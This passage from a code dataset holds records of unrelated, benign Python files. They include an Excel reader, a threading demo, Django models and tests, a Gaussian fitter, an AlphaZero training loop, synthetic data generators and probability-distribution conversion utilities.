action=\"store_true\", dest=\"show_parameters\")\n parser.add_argument(\"--query\", action=\"store_true\", dest=\"query\")\n parser.add_argument(\"--plot-hslices\", action=\"store_true\", dest=\"plot_hslices\")\n parser.add_argument(\"--plot-vslices\", action=\"store_true\", dest=\"plot_vslices\")\n parser.add_argument(\"--quiet\", action=\"store_false\", dest=\"show_progress\", default=True)\n parser.add_argument(\"--debug\", action=\"store_true\", dest=\"debug\", default=True)\n return parser.parse_args()\n\n# ======================================================================\nif __name__ == \"__main__\":\n SlicesApp().main()\n\n# End of file\n","sub_path":"slices/slicer.py","file_name":"slicer.py","file_ext":"py","file_size_in_byte":18057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185239141","text":"# Program extracting all columns \n# name in Python \nimport xlrd \n\nimport codecs\n\nloc = (\"data.xlsx\") \n \nwb = xlrd.open_workbook(loc) \n\n#################################\n# sheet_names = wb.sheet_names()\n# f = codecs.open(\"out.txt\",\"w\",\"utf8\")\n# for name in sheet_names:\n# \tf.write(name + \"\\n\")\n# f.close() \n################################\n\nsheet_name = \"ぐるなび\"\nsheet = wb.sheet_by_name(sheet_name)\n\nf = codecs.open(\"outX.xlsx\",\"w\",\"utf8\")\n\nfor i in range(2,sheet.nrows):\n\t# for j in range(sheet.ncols):\n\tname = str(sheet.cell(i,4).value) + \",\"\n\t\n\tif sheet.cell(i,11).value == xlrd.empty_cell.value:\n\t\tname += str(sheet.cell(i,10).value)\n\telse:\n\t\tname += str(sheet.cell(i,11).value)\n\n\tf.write(name)\n\tf.write(\"\\n\")\n\t\t\nf.close() \n","sub_path":"readExcel.py","file_name":"readExcel.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"263955989","text":"import threading\nimport time\n\nclass Hilo(threading.Thread):\n # proceso a ejecutar\n def run(self):\n print(\"{} Incio\".format(self.getName()) )\n time.sleep(1)\n print(\"{} Terminado\".format(self.getName()))\n\n# Los hilos cuando se terminan , simplemente dejan de ejecutar\n\nif __name__ == '__main__':\n for x in range(9):\n hilo = Hilo(name=\"Hilo - {}\".format(x+1))\n # para inciar los hilos en python hay que indicar\n hilo.start() # start indica la ejecución\n time.sleep(.5)\n\n \n\n","sub_path":"core/hilos/ed_team/Second.py","file_name":"Second.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"42642608","text":"guide = {\"merry\":\"god\", \"christmas\":\"jul\", \"and\":\"och\", \"happy\":\"gott\", \"new\":\"nytt\", \"year\":\"år\"}\nk = guide.keys()\nsm=[]\nflag = 0\nintext = input(\"Enter the text=\").split()\n#print (intext)\nfor i in intext:\n if(i in k):\n sm.append(guide[i])\n #print (\"swidden message=\",sw)\n else:\n flag = 1\n break\nif(flag == 0):\n print (\"swidden message=\",\" \".join(sm))\nelse:\n print(\"oops..... insert valid input......\")\n","sub_path":"Exercises/Urvi/Collections and Iterations/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"488943674","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/www.django/makarthy/codenerix_extensions/files/models.py\n# Compiled at: 2017-04-28 08:28:21\n# Size of source mod 2**32: 2198 bytes\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db import models\nfrom codenerix.lib.helpers import upload_path\nfrom codenerix.fields import FileAngularField, ImageAngularField\n\nclass GenDocumentFile(models.Model):\n doc_path = FileAngularField(_('Doc Path'), upload_to=upload_path, max_length=200, blank=False, null=False)\n name_file = models.CharField(_('Name'), max_length=254, blank=False, null=False)\n\n class Meta:\n abstract = True\n\n\nclass GenDocumentFileNull(models.Model):\n doc_path = FileAngularField(_('Doc Path'), upload_to=upload_path, max_length=200, blank=True, null=True)\n name_file = models.CharField(_('Name'), max_length=254, blank=True, null=True)\n\n class Meta:\n abstract = True\n\n\nclass GenImageFile(models.Model):\n image = ImageAngularField(_('Image'), upload_to=upload_path, max_length=200, blank=False, null=False)\n name_file = models.CharField(_('Name'), max_length=254, blank=True, null=True)\n\n class Meta:\n abstract = True\n\n\nclass GenImageFileNull(models.Model):\n image = ImageAngularField(_('Image'), upload_to=upload_path, max_length=200, blank=True, null=True)\n name_file = models.CharField(_('Name'), max_length=254, blank=True, null=True)\n\n class Meta:\n abstract = True","sub_path":"pycfiles/django_codenerix_extensions-1.0.17-py2.py3-none-any/models.cpython-35.py","file_name":"models.cpython-35.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"148028622","text":"#!/usr/bin/env python\n\nimport sys\n\nfilter_file = sys.argv[1]\n\nwith open(filter_file) as f:\n linefilter = set([l.strip() for l in f.readlines() if l.strip()])\n\nfor line in sys.stdin:\n if line.split()[0] in linefilter:\n print(line.strip(\"\\n\"))\n","sub_path":"static_data/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"91404999","text":"import cv2\nmask_image = cv2.imread('d:/data/mask_circle.png')\nback_image = cv2.imread('d:/data/iceberg.png')\nmask_image = cv2.resize(mask_image, (300,400))\nback_image = cv2.resize(back_image, (300,400))\n\nmask_ANDed = cv2.bitwise_and(mask_image, back_image)\nmask_ORed = cv2.bitwise_or(mask_image, back_image)\nmask_XORed = cv2.bitwise_xor(mask_image, back_image)\n\ncv2.imshow('mask', mask_image)\ncv2.imshow('back', back_image)\ncv2.imshow('mask and', mask_ANDed)\ncv2.imshow('mask or', mask_ORed)\ncv2.imshow('mask xor', mask_XORed)\n\n# 다음 두 행은 키보드 입력을 기다렸다가 모든 창을 끄고 종료하는 코드\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"deu/python and data science/PJH13-4.py","file_name":"PJH13-4.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90302835","text":"class choice:\n REGION_CHOICES = (\n ('srilanka', 'Sri Lanka'),\n ('jaffna', 'Jaffna'),\n ('idaikkadu', 'Idaikkadu'),\n ('australia', 'Australia'),\n ('canada', 'Canada'),\n ('swiss', 'Swiss'),\n ('uk', 'UK'),\n ('europe', 'Europe'),\n ('middleeast', 'Middle East'),\n ('asia', 'Asia'),\n )\n\n MENU_CHOICES = (\n ('News', 'News'),\n ('Obituary', 'Obituary'),\n ('School', 'School'),\n ('Story', 'Story'),\n ('Association', 'Association'),\n ('Article', 'Article'),\n ('Thankyou', 'Thankyou'),\n ('Temple', 'Temple'),\n ('Library', 'Library'),\n ('Wedding', 'Wedding'),\n ('Invitation', 'Invitation'),\n ('Other', 'Other'),\n )\n\n SECTION_CHOICES = (\n ('F', 'International'),\n ('I', 'Idaikkadu'),\n ('S', 'Srilanka'),\n )\n\n APPROVAL_CHOICES = (\n ('Y', 'Yes'),\n ('N', 'No'),\n )\n","sub_path":"web/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"603129333","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os.path\n\ndef map_k_precision(truthvalues, predictions):\n '''\n This is a faster implementation of MAP@k valid for numpy arrays.\n It is only valid when there is one single truth value.\n\n m ~ number of observations\n k ~ MAP at k -- in this case k should equal 3\n\n truthvalues.shape = (m,)\n predictions.shape = (m, k)\n '''\n z = (predictions == truthvalues[:, None]).astype(np.float32)\n weights = 1./(np.arange(predictions.shape[1], dtype=np.float32) + 1.)\n z = z * weights[None, :]\n return np.mean(np.sum(z, axis=1))\n\ndef main():\n assert(os.path.isfile(sys.argv[1]))\n df_train = pd.read_csv('../input/train.csv')\n\n with open(sys.argv[1], 'r') as fh:\n lines=fh.readlines()[1:]\n\n truthvalues = np.zeros(len(lines), dtype=np.int64)\n predictions = np.zeros((len(lines), 3), dtype=np.int64)\n\n for i, line in enumerate(lines):\n row_id, placeids = line.strip().split(',')\n row_id = int(row_id)\n\n placeids = np.array([int(x) for x in placeids.split()], \n dtype=np.int64)\n\n truthvalues[i] = df_train.place_id.values[row_id]\n predictions[i] = placeids\n\n\n print(map_k_precision(truthvalues, predictions))\n \n pass\n\nif __name__ == '__main__':\n main()","sub_path":"validation_score.py","file_name":"validation_score.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"251322467","text":"import re\n\nfrom html_page import HtmlPage\nimport exceptions\n\n\nclass AnimePages(HtmlPage):\n \"\"\"List of all anime pages URL\"\"\"\n def __init__(self, url):\n super(AnimePages, self).__init__(url)\n match = re.search(' abs(np.min(yy-const_0)):\n scale_0 = self.scale_0 = np.max(yy)-const_0\n mean_0 = self.mean_0 = np.squeeze(xx[np.argmax(yy)])\n else:\n scale_0 = self.scale_0 = np.min(yy)-const_0\n mean_0 = self.mean_0 = np.squeeze(xx[np.argmin(yy)])\n\n mask_above_half = yy-const_0 > scale_0/2\n\n if np.sum(mask_above_half) > 1:\n sigma_0 = abs(xx[mask_above_half][-1] - xx[mask_above_half][0])/factor_fwhm\n else:\n sigma_0 = 1\n\n self.sigma_0 = sigma_0\n\n if fit_const:\n p0 = self.p0 = [scale_0, mean_0, sigma_0, const_0]\n else:\n p0 = self.p0 = [scale_0, mean_0, sigma_0]\n else:\n self.p0 = p0\n if fit_const:\n self.scale_0, self.mean_0, self.sigma_0, self.const_0 = p0\n else:\n self.scale_0, self.mean_0, self.sigma_0 = p0\n self.const_0 = 0\n\n try:\n self.popt, self.pcov = curve_fit(self.fit_func, xx, yy, p0=p0, jac=self.jacobi, maxfev=100)\n except RuntimeError:\n try:\n p0[2] *= 5\n self.popt, self.pcov = curve_fit(self.fit_func, xx, yy, p0=p0, jac=self.jacobi, maxfev=100)\n except RuntimeError as e:\n if raise_:\n raise\n self.popt, self.pcov = p0, np.ones([len(p0), len(p0)], float)\n if print_:\n print(e)\n print('Fit did not converge. Using p0 instead!')\n\n if fit_const:\n self.scale, self.mean, self.sigma, self.const = self.popt\n else:\n self.scale, self.mean, self.sigma = self.popt\n self.const = 0\n self.sigma = abs(self.sigma)\n self.reconstruction = self.fit_func(xx, *self.popt)\n self.fit_integral = self.scale*self.sigma*np.sqrt(2*np.pi)\n\n if print_:\n print(p0, '\\t\\t', self.popt)\n\n @staticmethod\n def fit_func(xx, scale, mean, sig, const=0):\n #return scale*stats.norm.pdf(xx, mean, sig)\n if sig != 0:\n return scale*np.exp(-(xx-mean)**2/(2*sig**2))+const\n else:\n return 0\n\n def jacobi(self, xx, scale, mean, sig, const=0):\n g_minus_const = self.fit_func(xx, scale, mean, sig, 0)\n if scale == 0:\n self.jacobi_arr[:,0] = 0\n else:\n self.jacobi_arr[:,0] = g_minus_const/scale\n if sig != 0:\n self.jacobi_arr[:,1] = g_minus_const * (xx-mean)/sig**2\n self.jacobi_arr[:,2] = g_minus_const * (xx-mean)**2/sig**3\n else:\n self.jacobi_arr[:,1] = self.jacobi_arr[:,2] = np.inf\n\n return self.jacobi_arr\n\n def plot_data_and_fit(self, sp):\n sp.plot(self.xx, self.yy, label='Data', marker='.')\n xx2 = np.linspace(self.xx[0], self.xx[-1], 100)\n reconstruction2 = self.fit_func(xx2, *self.popt)\n sp.plot(xx2, reconstruction2, label='Reconstruction', marker='.', ls='--')\n sp.axhline(self.scale_0+self.const_0, label='scale_0+const_0', color='black')\n sp.axhline(self.scale+self.const, label='scale+const', color='black', ls='--')\n\n sp.axhline(self.const_0, label='const_0', color='black')\n sp.axhline(self.const, label='const', color='black', ls='--')\n\n sp.axvline(self.mean_0, label='mean_0', color='red')\n sp.axvline(self.mean, label='mean', color='red', ls='--')\n\n sp.axvline(self.mean_0-self.sigma_0, label='sigma_0', color='green')\n sp.axvline(self.mean_0+self.sigma_0, color='green')\n sp.axvline(self.mean-self.sigma, label='sigma', color='green', ls='--')\n sp.axvline(self.mean+self.sigma, color='green', ls='--')\n sp.legend()\n\n","sub_path":"gaussfit.py","file_name":"gaussfit.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"434288410","text":"# -*- coding:UTF-8 -*-\nfrom bs4 import BeautifulSoup\nimport requests\n\nif __name__ == '__main__':\n target = 'https://www.juzikong.com/collections/2707751a-63c1-4115-9986-ee91d2363680'\n req = requests.get(url=target)\n req.encoding = 'GBK' # 增加encoding=‘GBK’,解决中文乱码问题\n soup = BeautifulSoup(req.text, 'lxml')\n print(\"soup\",soup)\n # texts = soup.find_all('div', class_='showtxt')\n # print(texts[0].text.replace('\\xa0'*8, '\\n\\n'))\n\n\n","sub_path":"python/nicai.py","file_name":"nicai.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"176891376","text":"import asyncio\nimport functools\n\nfrom . import parsers\n\n\n__all__ = ()\n\n\nreject = (None,)\n\n\nskip = reject.__contains__\n\n\ndef apply(first, *checks, skip = skip):\n\n def execute(*args):\n\n value = first(*args)\n\n if not skip or not skip(value):\n\n for check in checks:\n\n check(value)\n\n return value\n\n return execute\n","sub_path":"strdata/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"125171633","text":"import glob\nimport os\nimport pickle\nimport time\nimport numpy as np\nimport tensorflow as tf\n\nfrom config import AlphaZeroConfig\nfrom network import Network\n\nCONFIG = AlphaZeroConfig()\n\ndef sample_batch(buffer_dir):\n\n # Get last N pickled elements and append them to a list\n glob_pattern = os.path.join(buffer_dir, '*[0-9].pickle')\n file_list = sorted(glob.glob(glob_pattern, recursive=False))\n num_samples = min(len(file_list), CONFIG.buffer_max_size)\n game_list = []\n\n for name in file_list[-num_samples:]:\n with open(name, 'rb') as f:\n game_list.append(pickle.load(f))\n games = np.random.choice(game_list, size=CONFIG.batch_size)\n game_pos = [(g, np.random.randint(len(g[\"mol_smiles\"])-1)) for g in games]\n\n mol = [z[\"network_inputs\"][\"mol\"][i] for (z, i) in game_pos]\n next_mols = [z[\"network_inputs\"][\"next_mols\"][i] for (z, i) in game_pos]\n action_mask = [z[\"network_inputs\"][\"action_mask\"][i] for (z, i) in game_pos]\n\n pi = [z[\"network_inputs\"][\"pi\"][i] for (z, i) in game_pos]\n\n # Get ranked reward threshold over the entire buffer\n rewards = [z[0][\"reward\"] for z in game_pos]\n r_alpha = np.percentile(rewards, 100.*CONFIG.ranked_reward_alpha)\n\n # Compute the ranked reward for each sampled game\n v = []\n for (z, _) in game_pos:\n value = z[\"reward\"]\n if value < r_alpha:\n rr = -1.\n elif value > r_alpha:\n rr = 1.\n else:\n rr = np.random.choice([-1., 1.])\n v.append(rr)\n \n return mol, next_mols, action_mask, v, pi\n\ndef train_model(network, buffer_dir, model_dir):\n for iteration in range(CONFIG.training_iterations):\n mol, next_mols, action_mask, v, pi = sample_batch(buffer_dir)\n #for gs in range(CONFIG.gradient_steps_per_batch):\n #loss = network.model.train_on_batch([mol, next_mols, action_mask], [v, pi])\n checkpoint_filepath = os.path.join(model_dir,'cp.ckpt')\n cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_filepath,\n save_weights_only=True,\n save_best_only=False,\n verbose=0\n )\n history = network.model.fit([np.asarray(mol), np.asarray(next_mols), np.asarray(action_mask)], \n [np.asarray(v), np.asarray(pi)],\n epochs=CONFIG.gradient_steps_per_batch,\n callbacks=[cp_callback],\n verbose=0)\n network.model.save_weights(checkpoint_filepath)\n #network.model.save(os.path.join(model_dir,'model_{}.h5'.format(time.strftime(\"%Y%m%d-%H%M%S\"))))\n\nif __name__ == \"__main__\":\n\n current_path = os.getcwd()\n buffer_dir = os.path.join(current_path, 'pickled_objects')\n model_dir = os.path.join(current_path, 'saved_models')\n\n network = Network(model_dir)\n network.compile()\n train_model(network, buffer_dir, model_dir)","sub_path":"molecule_builder/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195227752","text":"def split (string, symbol):\n l = []\n start = 0\n i = 0\n for char in string:\n if char == symbol:\n if start < i:\n l.append(string[start:i])\n i += 1\n start = i\n else:\n i += 1\n if start < i:\n l.append(string[start:i])\n return l\n\n\nif __name__ == '__main__':\n print(split('dsafgad fdsaf ads dsaf fagda fdfs ', ' '))\n","sub_path":"python/algorithms/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"359078931","text":"#! coding: utf-8\nimport io\nimport json\nimport os\nimport csv\nimport zipfile\n\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.test import TestCase\nfrom django_datajsonar.models import Field, Node\n\nfrom series_tiempo_ar_api.libs.indexing.elastic import ElasticInstance\nfrom series_tiempo_ar_api.apps.management import meta_keys\nfrom series_tiempo_ar_api.apps.dump.csv import CSVDumpGenerator\nfrom series_tiempo_ar_api.apps.dump.models import CSVDumpTask\nfrom series_tiempo_ar_api.apps.dump import constants\nfrom series_tiempo_ar_api.utils import index_catalog\n\n\nsamples_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'samples')\n\n\nclass CSVTest(TestCase):\n index = 'csv_dump_test_index'\n # noinspection PyUnresolvedReferences\n directory = os.path.join(settings.MEDIA_ROOT, 'test_dump')\n\n @classmethod\n def setUpClass(cls):\n super(CSVTest, cls).setUpClass()\n cls.catalog_id = 'csv_dump_test_catalog'\n path = os.path.join(samples_dir, 'distribution_daily_periodicity.json')\n index_catalog(cls.catalog_id, path, cls.index)\n cls.task = CSVDumpTask()\n cls.task.save()\n gen = CSVDumpGenerator(cls.task, index=cls.index, output_directory=cls.directory)\n gen.generate()\n\n def test_values_dump(self):\n file = self.task.dumpfile_set.get(file_name=constants.VALUES_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # skip header\n row = next(reader)\n self.assertEqual(row[0], self.catalog_id)\n self.assertEqual(row[6], 'R/P1D')\n\n def test_values_length(self):\n file = self.task.dumpfile_set.get(file_name=constants.VALUES_CSV).file\n file.open('r')\n reader = csv.reader(file)\n header = next(reader)\n self.assertEqual(len(header), 7)\n\n def test_entity_identifiers(self):\n file = self.task.dumpfile_set.get(file_name=constants.VALUES_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader)\n\n row = next(reader)\n\n field_id = row[3]\n field = Field.objects.get(identifier=field_id)\n\n self.assertEqual(self.catalog_id, row[0])\n self.assertEqual(field.distribution.identifier, row[2])\n self.assertEqual(field.distribution.dataset.identifier, row[1])\n self.assertEqual(row[6], field.distribution.enhanced_meta.get(key=meta_keys.PERIODICITY).value)\n\n def test_full_csv_zipped(self):\n path = self.task.dumpfile_set.get(file_name=constants.FULL_CSV_ZIPPED).file.path\n csv_zipped = zipfile.ZipFile(path)\n\n # Necesario para abrir archivos zippeados en modo texto (no bytes)\n src_file = io.TextIOWrapper(csv_zipped.open(constants.FULL_CSV),\n encoding='utf8',\n newline='')\n reader = csv.reader(src_file)\n\n header = next(reader)\n\n self.assertEqual(len(header), 15)\n\n def test_full_csv_identifier_fields(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n self.assertEqual(row[0], self.catalog_id)\n self.assertEqual(row[1], field.distribution.dataset.identifier)\n self.assertEqual(row[2], field.distribution.identifier)\n self.assertEqual(row[5], field.distribution.enhanced_meta.get(key=meta_keys.PERIODICITY).value)\n\n def test_full_csv_metadata_fields(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n\n field_meta = json.loads(field.metadata)\n distribution_meta = json.loads(field.distribution.metadata)\n self.assertEqual(row[7], field.title)\n self.assertEqual(row[8], field_meta['units'])\n self.assertEqual(row[9], field_meta['description'])\n self.assertEqual(row[10], distribution_meta['description'])\n\n def test_full_csv_dataset_metadata_fields(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n\n dataset_meta = json.loads(field.distribution.dataset.metadata)\n self.assertEqual(row[12], dataset_meta['publisher']['name'])\n self.assertEqual(row[13], dataset_meta['source'])\n self.assertEqual(row[14], field.distribution.dataset.title)\n\n def test_full_csv_dataset_theme_field(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n\n dataset_meta = json.loads(field.distribution.dataset.metadata)\n\n themes = json.loads(Node.objects.get(catalog_id=self.catalog_id).catalog)['themeTaxonomy']\n\n theme_label = ''\n for theme in themes:\n if theme['id'] == dataset_meta['theme'][0]:\n theme_label = theme['label']\n break\n\n self.assertEqual(theme_label, row[11])\n\n @classmethod\n def tearDownClass(cls):\n ElasticInstance.get().indices.delete(cls.index)\n Node.objects.all().delete()\n\n\nclass CSVDumpCommandTests(TestCase):\n index = 'csv_dump_cmd_test_index'\n\n @classmethod\n def setUpClass(cls):\n super(CSVDumpCommandTests, cls).setUpClass()\n ElasticInstance.get().indices.create(cls.index)\n\n def setUp(self):\n CSVDumpTask.objects.all().delete()\n\n def test_command_creates_model(self):\n call_command('generate_dump', index=self.index)\n self.assertEqual(CSVDumpTask.objects.count(), 1)\n\n task = CSVDumpTask.objects.first()\n self.assertTrue(task.dumpfile_set.count(), task.logs)\n\n @classmethod\n def tearDownClass(cls):\n ElasticInstance.get().indices.delete(cls.index)\n","sub_path":"series_tiempo_ar_api/apps/dump/tests/csv_generator_tests.py","file_name":"csv_generator_tests.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"296593303","text":"import numpy as np\nimport pandas as pd\nimport sys\n\nclass _BasicDataGenerator():\n def __init__(self):\n self.n_rows = None\n self.n_cols = None\n self.seed = None\n \n def generate(self,n_rows = 100, n_cols = 10, seed = None):\n self.n_rows = n_rows\n self.n_cols = n_cols\n if seed is None:\n self.seed = np.random.randint(0, 420000)\n else:\n self.seed = seed\n\nclass MatrixGenerator(_BasicDataGenerator):\n def __init__(self):\n super().__init__()\n \n def _generate_basic_dataset(self, loc = 0, scale = 1):\n np.random.seed(seed = self.seed)\n X = np.random.normal(loc = loc, scale = scale, size = (self.n_rows,self.n_cols))\n y = np.random.binomial(1, np.exp(X.sum(axis=1))/(1+np.exp(X.sum(axis=1))))\n return X,y\n\n def _generate_noise(self, sigma_min, sigma_max, loc = 0):\n np.random.seed(seed = self.seed)\n noise_sigmas = np.random.uniform(sigma_min, sigma_max, size = self.n_cols)\n noise = np.random.normal(loc = loc, scale = noise_sigmas, size = (self.n_rows,self.n_cols))\n return noise, noise_sigmas\n\n def generate(self,n_rows = 100, n_cols = 10, loc = 0, noise_sigma_range = (0,1), seed = None, round_level = None):\n assert isinstance(n_rows, int), \"Argument `n_rows` must be int.\"\n assert isinstance(n_cols, int), \"Argument `n_cols` must be int.\"\n assert isinstance(loc, int), \"Argument `loc` must be int or float.\"\n assert isinstance(noise_sigma_range, tuple) and len(noise_sigma_range) == 2, \"Argument `noise_sigma_man_std` must be tuple of length 2.\"\n\n super().generate(n_rows, n_cols, seed)\n np.random.seed(seed = self.seed)\n\n self.loc = 0\n self.noise_sigma_min = noise_sigma_range[0]\n self.noise_sigma_max = noise_sigma_range[1]\n\n # Generate basic dataset\n X,y = self._generate_basic_dataset(loc=0, scale=1)\n # Generate noise\n noise, noise_sigmas = self._generate_noise(sigma_min=self.noise_sigma_min, sigma_max=self.noise_sigma_max)\n X_transformed = X + noise\n\n # Calculate costs\n costs = 1/noise_sigmas\n\n # Round output if selected\n if round_level:\n X_transformed = X_transformed.round(round_level)\n \n return X_transformed, y, list(costs)\n\nclass DataFrameGenerator(MatrixGenerator):\n def __init__(self):\n super().__init__()\n\n def _generate_colnames(self, n):\n new_cols = ['var_' + str(i) for i in np.arange(1,n+1)]\n return new_cols\n\n def generate(self,n_rows = 100, n_cols = 10, loc = 0, noise_sigma_range = (0,1), seed = None, round_level = None):\n X,y,costs = super().generate(n_rows = n_rows, n_cols = n_cols, loc = loc, noise_sigma_range = noise_sigma_range, seed = seed, round_level = round_level)\n # Generate colnames\n cols = self._generate_colnames(self.n_cols)\n\n # Zip costs\n costs_dict = dict(zip(cols,costs))\n\n # Create final data frame\n X_df = pd.DataFrame(X, columns = cols)\n y_series = pd.Series(y)\n\n return X_df, y_series, costs_dict","sub_path":"bcselector/data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"210840394","text":"\"\"\"This module implements functions to convert distributions between various representations\nThese functions should then be registered with the `qp.ConversionDict` using `qp_add_mapping`.\nThat will allow the automated conversion mechanisms to work.\n\"\"\"\nimport numpy as np\nfrom scipy import integrate as sciint\nfrom scipy import interpolate as sciinterp\n\nfrom .lazy_modules import mixture\nfrom .sparse_rep import (build_sparse_representation, decode_sparse_indices,\n indices2shapes)\n\n\ndef extract_vals_at_x(in_dist, **kwargs):\n \"\"\"Convert using a set of x and y values.\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n xvals : `np.array`\n Locations at which the pdf is evaluated\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n xvals = kwargs.pop('xvals', None)\n if xvals is None: # pragma: no cover\n raise ValueError(\"To convert to extract_xy_vals you must specify xvals\")\n yvals = in_dist.pdf(xvals)\n return dict(xvals=xvals, yvals=yvals)\n\n\ndef extract_xy_vals(in_dist, **kwargs):\n \"\"\"Convert using a set of x and y values.\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n xvals : `np.array`\n Locations at which the pdf is evaluated\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n xvals = kwargs.pop('xvals', None)\n if xvals is None: # pragma: no cover\n raise ValueError(\"To convert using extract_xy_vals you must specify xvals\")\n yvals = in_dist.pdf(xvals)\n expand_x = np.ones(yvals.shape) * np.squeeze(xvals)\n return dict(xvals=expand_x, yvals=yvals)\n\n\ndef extract_samples(in_dist, **kwargs):\n \"\"\"Convert using a set of values sampled from the PDF\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n size : `int`\n Number of samples to generate\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n samples = in_dist.rvs(size=kwargs.pop('size', 1000))\n xvals = kwargs.pop('xvals')\n return dict(samples=samples, xvals=xvals, yvals=None)\n\n\ndef extract_hist_values(in_dist, **kwargs):\n \"\"\"Convert using a set of values sampled from the PDF\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n bins : `np.array`\n Histogram bin edges\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n bins = kwargs.pop('bins', None)\n if bins is None: # pragma: no cover\n raise ValueError(\"To convert using extract_hist_samples you must specify bins\")\n bins, pdfs = in_dist.histogramize(bins)\n return dict(bins=bins, pdfs=pdfs)\n\n\ndef extract_hist_samples(in_dist, **kwargs):\n \"\"\"Convert using a set of values samples that are then histogramed\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n bins : `np.array`\n Histogram bin edges\n size : `int`\n Number of samples to generate\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n bins = kwargs.pop('bins', None)\n size = kwargs.pop('size', 1000)\n if bins is None: # pragma: no cover\n raise ValueError(\"To convert using extract_hist_samples you must specify bins\")\n samples = in_dist.rvs(size=size)\n\n def hist_helper(sample):\n return np.histogram(sample, bins=bins)[0]\n vv = np.vectorize(hist_helper, signature=\"(%i)->(%i)\" % (samples.shape[0], bins.size-1))\n pdfs = vv(samples)\n return dict(bins=bins, pdfs=pdfs)\n\n\ndef extract_quantiles(in_dist, **kwargs):\n \"\"\"Convert using a set of quantiles and the locations at which they are reached\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n Other Parameters\n ----------------\n quantiles : `np.array`\n Quantile values to use\n\n Returns\n -------\n data : `dict`\n The extracted data\n \"\"\"\n quants = kwargs.pop('quants', None)\n if quants is None: # pragma: no cover\n raise ValueError(\"To convert using extract_quantiles you must specify quants\")\n locs = in_dist.ppf(quants)\n return dict(quants=quants, locs=locs)\n\n\ndef extract_fit(in_dist, **kwargs): # pragma: no cover\n \"\"\"Convert to a functional distribution by fitting it to a set of x and y values\n\n Parameters\n ----------\n in_dist : `qp.Ensemble`\n Input distributions\n\n 